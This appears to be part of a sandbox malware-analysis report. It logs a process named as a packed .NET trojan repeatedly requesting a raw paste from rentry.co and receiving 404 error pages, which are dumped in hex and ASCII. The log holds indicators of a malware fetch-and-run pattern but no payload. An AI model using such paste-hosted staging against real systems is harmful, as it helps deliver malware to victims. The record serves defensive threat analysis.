                                                                                        2024-10-18 10:42:49 UTC705INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:49 UTC1369INData Raw: 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <m
                                                                                        2024-10-18 10:42:49 UTC1369INData Raw: 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20
                                                                                        Data Ascii: ry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:42:49 UTC1017INData Raw: 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 38 32 62 61 36 31 64 64 62 33 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 32 4f 53
                                                                                        Data Ascii: js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ec82ba61ddb3',t:'MTcyOTI0ODE2OS
                                                                                        2024-10-18 10:42:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.660658104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:52 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:42:53 UTC683INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:53 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6iVXO4k2lidhC9auqRVcPxpZp%2Fu%2FZCA4WLxNXxNekv3hmCl7yAh%2Fq4%2FZFtsmoYduqfzgsoXxfE6cWar43z243SriRwLDUouiWJxUQ%2BLilYx0mnAzlniu3TdijQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ec98fff5a924-DFW
                                                                                        2024-10-18 10:42:53 UTC686INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:53 UTC1369INData Raw: 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20
                                                                                        Data Ascii: icons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and
                                                                                        2024-10-18 10:42:53 UTC1369INData Raw: 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74
                                                                                        Data Ascii: entry.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container cont
                                                                                        2024-10-18 10:42:53 UTC1036INData Raw: 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 39 38 66 66 66 35 61 39 32 34
                                                                                        Data Ascii: cript src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ec98fff5a924
                                                                                        2024-10-18 10:42:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.660659104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:55 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:55 UTC658INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:55 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nBbHmNftzEJSxewc8MhFrBo4EpMK%2BB7O2XWkwbzCQ5cXCjv2X2vNOv6IXrqTBzi3vVUm4lqJPZywGn7AkkYJG8%2Bn%2FEoBgZtzL2C25uyH%2BseVrYDUJf2SvnKagg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ecaa4eae143c-DFW
                                                                                        2024-10-18 10:42:55 UTC711INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:55 UTC1369INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72
                                                                                        Data Ascii: eta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta pr
                                                                                        2024-10-18 10:42:55 UTC1369INData Raw: 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: ; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:42:55 UTC1011INData Raw: 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 61 61 34 65 61 65 31 34 33 63 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 33 4e 53 34 77 4d 44 41 77
                                                                                        Data Ascii: tstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ecaa4eae143c',t:'MTcyOTI0ODE3NS4wMDAw
                                                                                        2024-10-18 10:42:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.660664104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:57 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:58 UTC675INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:58 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=brOtjqovAo7cqvgpIAydgsomHmvuur7PvVXAu8O2M7YlvftEYa9Kny35jsCVcuKkIyxYwaY1mU8rn27XjpchGb1FSP5%2Fc38uqUhhKRCIL7CJTq68V2jlLCvwVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ecb8caaa466e-DFW
                                                                                        2024-10-18 10:42:58 UTC694INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:58 UTC1369INData Raw: 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e
                                                                                        Data Ascii: 2.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing.
                                                                                        2024-10-18 10:42:58 UTC1369INData Raw: 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d
                                                                                        Data Ascii: g' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-sm
                                                                                        2024-10-18 10:42:58 UTC1028INData Raw: 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 62 38 63 61 61 61 34 36 36 65 27 2c 74 3a 27 4d 54 63
                                                                                        Data Ascii: c="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ecb8caaa466e',t:'MTc
                                                                                        2024-10-18 10:42:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.660667104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:00 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:00 UTC652INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:00 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iuADk%2FKPGRg2emX3qmtIujU46eyECHOf5KpPuj1nDFYYbRRI2Yu1ldlOs05Z7X2uJ26q5446V1p9oynQiV1kQJZ07cnvSu1exip3Bn1oGUHz8QFx3pKPXCa91Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ecc6cbeb486b-DFW
